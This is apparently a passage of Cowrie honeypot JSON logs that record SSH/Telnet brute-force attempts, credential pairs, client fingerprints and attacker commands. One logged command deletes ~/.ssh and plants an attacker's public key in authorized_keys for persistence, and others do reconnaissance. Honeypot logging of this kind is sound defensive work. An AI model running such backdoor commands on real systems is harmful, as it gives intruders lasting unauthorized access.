[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:44:15.556891Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.login.failed","username":"user","password":"iforgot","message":"login attempt [user/iforgot] failed","sensor":"my-vps","timestamp":"2025-08-26T22:44:15.987008Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.login.failed","username":"user","password":"hallo","message":"login attempt [user/hallo] failed","sensor":"my-vps","timestamp":"2025-08-26T22:44:17.082080Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.login.failed","username":"user","password":"fatass","message":"login attempt [user/fatass] failed","sensor":"my-vps","timestamp":"2025-08-26T22:44:18.177653Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.login.failed","username":"user","password":"deadhead","message":"login attempt [user/deadhead] failed","sensor":"my-vps","timestamp":"2025-08-26T22:44:19.272880Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc12","message":"login attempt [user/abc12] failed","sensor":"my-vps","timestamp":"2025-08-26T22:44:20.348018Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:44:21.439792Z","src_ip":"80.94.95.15","session":"fcd4b3edf762"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":53180,"dst_ip":"1.2.3.4","dst_port":22,"session":"89a501042676","protocol":"ssh","message":"New connection: 106.12.128.104:53180 (1.2.3.4:22) [session: 89a501042676]","sensor":"my-vps","timestamp":"2025-08-26T22:44:54.252735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:44:54.253480Z","src_ip":"106.12.128.104","session":"89a501042676"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:44:54.450900Z","src_ip":"106.12.128.104","session":"89a501042676"}
{"eventid":"cowrie.login.failed","username":"tor","password":"tor","message":"login attempt [tor/tor] failed","sensor":"my-vps","timestamp":"2025-08-26T22:44:58.282100Z","src_ip":"106.12.128.104","session":"89a501042676"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:44:59.481614Z","src_ip":"106.12.128.104","session":"89a501042676"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53176,"dst_ip":"1.2.3.4","dst_port":22,"session":"555cbc485cb3","protocol":"ssh","message":"New connection: 212.227.235.229:53176 (1.2.3.4:22) [session: 555cbc485cb3]","sensor":"my-vps","timestamp":"2025-08-26T22:46:15.435878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:46:16.414845Z","src_ip":"212.227.235.229","session":"555cbc485cb3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:46:16.415578Z","src_ip":"212.227.235.229","session":"555cbc485cb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56024,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf3614c40453","protocol":"ssh","message":"New connection: 212.227.235.229:56024 (1.2.3.4:22) [session: cf3614c40453]","sensor":"my-vps","timestamp":"2025-08-26T22:46:20.286204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:46:20.287048Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"321","message":"login attempt [dspace/321] failed","sensor":"my-vps","timestamp":"2025-08-26T22:46:20.578269Z","src_ip":"212.227.235.229","session":"555cbc485cb3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:46:20.588182Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass123!@#","message":"login attempt [root/Pass123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:46:21.836403Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:46:22.508304Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:46:22.509085Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:46:22.509883Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:46:22.812963Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:46:22.907879Z","src_ip":"212.227.235.229","session":"555cbc485cb3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:46:23.436141Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T22:46:23.437166Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T22:46:23.740491Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:46:23.741521Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56032,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b970572319f","protocol":"ssh","message":"New connection: 212.227.235.229:56032 (1.2.3.4:22) [session: 0b970572319f]","sensor":"my-vps","timestamp":"2025-08-26T22:46:24.041878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:46:24.043031Z","src_ip":"212.227.235.229","session":"0b970572319f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:46:24.343085Z","src_ip":"212.227.235.229","session":"0b970572319f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T22:46:25.587358Z","src_ip":"212.227.235.229","session":"0b970572319f"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:46:26.890759Z","src_ip":"212.227.235.229","session":"0b970572319f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56036,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2a94f6e304d","protocol":"ssh","message":"New connection: 212.227.235.229:56036 (1.2.3.4:22) [session: b2a94f6e304d]","sensor":"my-vps","timestamp":"2025-08-26T22:46:27.190377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:46:27.191174Z","src_ip":"212.227.235.229","session":"b2a94f6e304d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:46:27.491859Z","src_ip":"212.227.235.229","session":"b2a94f6e304d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:46:28.735185Z","src_ip":"212.227.235.229","session":"b2a94f6e304d"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:46:29.035372Z","src_ip":"212.227.235.229","session":"cf3614c40453"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:46:29.036642Z","src_ip":"212.227.235.229","session":"b2a94f6e304d"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":34258,"dst_ip":"1.2.3.4","dst_port":22,"session":"0840eb5bf3d4","protocol":"ssh","message":"New connection: 106.12.128.104:34258 (1.2.3.4:22) [session: 0840eb5bf3d4]","sensor":"my-vps","timestamp":"2025-08-26T22:46:57.861987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:46:57.862775Z","src_ip":"106.12.128.104","session":"0840eb5bf3d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:46:58.072321Z","src_ip":"106.12.128.104","session":"0840eb5bf3d4"}
{"eventid":"cowrie.login.failed","username":"alex","password":"admin","message":"login attempt [alex/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T22:46:59.543420Z","src_ip":"106.12.128.104","session":"0840eb5bf3d4"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:00.755272Z","src_ip":"106.12.128.104","session":"0840eb5bf3d4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64870,"dst_ip":"1.2.3.4","dst_port":22,"session":"1790afb5bd03","protocol":"ssh","message":"New connection: 217.72.205.35:64870 (1.2.3.4:22) [session: 1790afb5bd03]","sensor":"my-vps","timestamp":"2025-08-26T22:47:23.259544Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:23.260643Z","src_ip":"217.72.205.35","session":"1790afb5bd03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33770,"dst_ip":"1.2.3.4","dst_port":22,"session":"20a6c1a28b75","protocol":"ssh","message":"New connection: 212.227.235.229:33770 (1.2.3.4:22) [session: 20a6c1a28b75]","sensor":"my-vps","timestamp":"2025-08-26T22:47:31.417313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-26T22:47:31.418212Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-26T22:47:31.758489Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T22:47:33.245437Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:47:34.587946Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:35.328585Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T22:47:35.329291Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T22:47:35.329708Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59270,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c711f2b4619","protocol":"telnet","message":"New connection: 212.227.235.229:59270 (1.2.3.4:23) [session: 8c711f2b4619]","sensor":"my-vps","timestamp":"2025-08-26T22:47:35.528977Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:35.671544Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:47:35.733450Z","src_ip":"212.227.235.229","session":"8c711f2b4619"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:35.750912Z","src_ip":"212.227.235.229","session":"8c711f2b4619"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:36.431363Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-26T22:47:36.432309Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
